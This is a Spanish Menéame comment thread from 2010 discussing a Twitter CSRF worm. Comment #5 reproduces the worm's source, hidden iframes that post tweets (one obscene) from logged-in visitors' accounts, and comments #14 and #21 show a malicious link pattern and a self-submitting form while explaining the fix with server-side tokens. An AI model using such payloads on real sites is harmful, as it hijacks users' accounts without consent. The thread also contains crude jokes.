Menéame: comentarios [1057401]

#26 Nueva vulnerabilidad afecta a Twitter en estos momentos

manuelmaria — Mon, 27 Sep 2010 19:19:50 +0000

Nada es seguro

» autor: manuelmaria

#25 Nueva vulnerabilidad afecta a Twitter en estos momentos

estoyausente — Mon, 27 Sep 2010 10:23:58 +0000

#14 sí... quizá tengas razón. Supongo que dejarán hacer peticiones mediante GET para facilitar los programillas con la API de twitter, que hay muchos.

Pero visto así...

Igualmente puedes lanzar de forma medianamente sencilla peticiones POST, ¿no? Aunque quizá complicase el script.

» autor: estoyausente

#24 Nueva vulnerabilidad afecta a Twitter en estos momentos

PussyLover — Mon, 27 Sep 2010 10:09:09 +0000

Vamos, que todo aquel que pinche en el enlace es que es zoofilico. Se podría sacar una buena estadistica de cuanta gente le va el tema.

» autor: PussyLover

#23 Nueva vulnerabilidad afecta a Twitter en estos momentos

dancion — Mon, 27 Sep 2010 09:58:08 +0000

twiiter quiere llegar a ser facebokk... y nunca lo sera me parece ami

» autor: dancion

#22 Nueva vulnerabilidad afecta a Twitter en estos momentos

tunic — Mon, 27 Sep 2010 08:06:33 +0000

#21 Por supuesto el método POST también se puede trucar, pero es más difícil. No basta con construir un enlace, se tienen que enviar los datos mediante POST lo que implica un poco más de proceso, que requiere JavaScript. Y como tú dices, cuando envías por POST el navegador puede avisarte (no todos lo hacen, eso sí), lo que a un usuario medianamente avispado le haría sospechar.

En el ejemplo de Twitter usan JS, pero realmente no sería necesario.

» autor: tunic

#21 Nueva vulnerabilidad afecta a Twitter en estos momentos

--14336-- — Sun, 26 Sep 2010 22:19:36 +0000

#14 El POST no salva el asunto. Ejemplo (no se aplica a ningún sitio en concreto):

<form method="POST" action="nuevo_tweet" id="miForm">
<input type="hidden" name="mensaje" value="te la he colado"/>
<input type="hidden" name="loqueusea" value="cualqueira"/>
</form>
<script>
<document.getElementById('miForm').submit();
</script>

La solución, ya sea por get o por post, es usar llaves generadas por el servidor, de forma que un atacante externo no pueda adivinarla.

Lo de hacer que las operaciones en el servidor (publicar una entrada) sean por POST en vez de por GET es debido a que por POST el navegador te avisa antes de volver a enviar algo, ya que suele usarse para hacer operaciones sobre bases de datos, y a que por POST no queda registro en el historial de la información enviada al servidor.

» autor: --14336--

#20 Nueva vulnerabilidad afecta a Twitter en estos momentos

RamonMercader — Sun, 26 Sep 2010 22:18:40 +0000

Esto huele a 4chan

» autor: RamonMercader

#19 Nueva vulnerabilidad afecta a Twitter en estos momentos

XM8 — Sun, 26 Sep 2010 22:12:43 +0000

Esto en jisko no pasaba.

» autor: XM8

#18 Nueva vulnerabilidad afecta a Twitter en estos momentos

--178478-- — Sun, 26 Sep 2010 22:06:55 +0000

no! espera! ahora si!

» autor: --178478--

#17 Nueva vulnerabilidad afecta a Twitter en estos momentos

--178478-- — Sun, 26 Sep 2010 22:06:45 +0000

no, ya no , lo han arreglado

» autor: --178478--

#16 Nueva vulnerabilidad afecta a Twitter en estos momentos

--178478-- — Sun, 26 Sep 2010 22:06:36 +0000

ahora si

» autor: --178478--

#15 Nueva vulnerabilidad afecta a Twitter en estos momentos

--178478-- — Sun, 26 Sep 2010 22:06:30 +0000

ahora ya no

» autor: --178478--

#14 Nueva vulnerabilidad afecta a Twitter en estos momentos

tunic — Sun, 26 Sep 2010 22:00:18 +0000

#10 #11 Yo lo calificaría de vulnerabilidad. El problema de base es que Twitter permite actualizar el estado de un usuario logado mediante una petición GET (es decir, un enlace acompañado de parámetros, lo que viene detrás de la '?'). De esta forma, es tan sencillo publicar un tweet en la cuenta de un usuario como conseguir que visite una página donde haya un enlace maliciosamente construido, del tipo:

twitter.com/share/update?status=<ponga aquí la frase inyectar>;

El enlace no tiene no que ser visible ni que ser pinchado por el usuario, basta con el que navegador acceda a él (por ejemplo, poniéndolo como origen de una imagen, es decir, en el atributo src de una etiqueta img).

Como el usuario está logado en Twitter la petición pasa todos los controles de seguridad; al fin y al cabo a todas luces parece una petición legítima de un usuario legítimo.

Por este tipo de problemas se recomienda que una aplicación web no permita hacer operaciones sobre los datos del usuario mediante peticiones GET (como en este caso, que permite crear un tweet mediante una petición GET). Las peticiones que modifiquen datos deberían hacerse usando POST (normalmente mediante un formulario).

Como no uso Twitter no sé por que no han escogido la opción POST para la creación de un nuevo tweet... sospecho que debe ser para facilitar la interacción externa (es más fácil construir un enlace con parámetros que una petición POST... aunque TAMPOCO es que sea tan difícil), pero si es por eso diría una pésima decisión de diseño. Lo mismo hay alguna poderosa razón para usar GET para la actualización de estado que yo desconozco, pero no se me ocurre cuál.

En fin, podrán haber deshabilitado ese enlace, pero pueden aparecer un montón más muy fácilmente. Deberían cambiar el método de actualización a POST para estar del todo seguro.

» autor: tunic

#13 Nueva vulnerabilidad afecta a Twitter en estos momentos

el_fake — Sun, 26 Sep 2010 21:59:17 +0000

Estos de twitter y facebook tienen una guerra de hackers que no es ni normal.

» autor: el_fake

#12 Nueva vulnerabilidad afecta a Twitter en estos momentos

--45163-- — Sun, 26 Sep 2010 20:44:07 +0000

No pienses en un oso blanco

» autor: --45163--

#11 Nueva vulnerabilidad afecta a Twitter en estos momentos

estoyausente — Sun, 26 Sep 2010 20:10:46 +0000

#10 en realidad si lo lees no es una vulnerabilidad de twitter ni nada por el estilo. La idea es simple y no es maliciosa, simplemente está hecha para reírse un rato del personal. No creo que sea complicado repetir algo así.

Y el texto es un descojono

» autor: estoyausente

#10 Nueva vulnerabilidad afecta a Twitter en estos momentos

--76102-- — Sun, 26 Sep 2010 19:24:38 +0000

Los de Twitter se están luciendo con sus vulnerabilidades desde el nuevo rediseño de la web principal que pretende sustituir a los clientes de escritorio. Al final los que usamos Tweetdeck y demás no echaremos en falta el rediseño.

» autor: --76102--

#9 Nueva vulnerabilidad afecta a Twitter en estos momentos

Ictineo — Sun, 26 Sep 2010 19:23:40 +0000

No me extraña...

www.meneame.net/story/chavez-usa-twitter-para-arengar-partidarios-jorn

» autor: Ictineo

#8 Nueva vulnerabilidad afecta a Twitter en estos momentos

zzzzzz — Sun, 26 Sep 2010 19:12:25 +0000

WTF: tinyurl.com/2wpodmb

» autor: zzzzzz

#7 Nueva vulnerabilidad afecta a Twitter en estos momentos

--148619-- — Sun, 26 Sep 2010 18:50:48 +0000

Parace ser que ya lo han arreglado: status.twitter.com/post/1192873885/malicious-links-on-twitter

UPDATE Sun Sep 26 18:41:49 UTC 2010: We’ve fixed the exploit and are in the process of removing the offending Tweets.

» autor: --148619--

#6 Nueva vulnerabilidad afecta a Twitter en estos momentos

--141578-- — Sun, 26 Sep 2010 18:46:31 +0000

[Usuario deshabilitado]

» autor: --141578--

#5 Nueva vulnerabilidad afecta a Twitter en estos momentos

--148619-- — Sun, 26 Sep 2010 18:46:22 +0000

este es el código del gusano según dicen por ahí: news.ycombinator.com/item?id=1729601

------------ 8< ----------- 8<--------------------
<html>
<head></head>
<body>
<script>
var el1 = document.createElement('iframe');
var el2 = document.createElement('iframe');
el1.style.visibility="hidden";
el2.style.visibility="hidden";
el1.src = "twitter.com/share/update?status=WTF: "; + window.location;
el2.src = "twitter.com/share/update?status=i love anal sex with goats";;
document.getElementsByTagName("body")[0].appendChild(el1);
document.getElementsByTagName("body")[0].appendChild(el2);
</script>
</body>
</html>
------------ 8< ----------- 8<--------------------

» autor: --148619--

#4 Nueva vulnerabilidad afecta a Twitter en estos momentos

--148619-- — Sun, 26 Sep 2010 18:43:27 +0000

Os suena el queso gruyere?

» autor: --148619--

#3 Nueva vulnerabilidad afecta a Twitter en estos momentos

--150977-- — Sun, 26 Sep 2010 18:27:15 +0000

#0 Actualiza la entradilla que ya hay más información en el enlace.

» autor: --150977--

#2 Nueva vulnerabilidad afecta a Twitter en estos momentos

--132341-- — Sun, 26 Sep 2010 18:23:33 +0000

Mierda, demasiado tarde! Sabía que mi amor por las cabras sería mi perdición.

» autor: --132341--

#1 Nueva vulnerabilidad afecta a Twitter en estos momentos

--136437-- — Sun, 26 Sep 2010 18:22:21 +0000

» autor: --136437--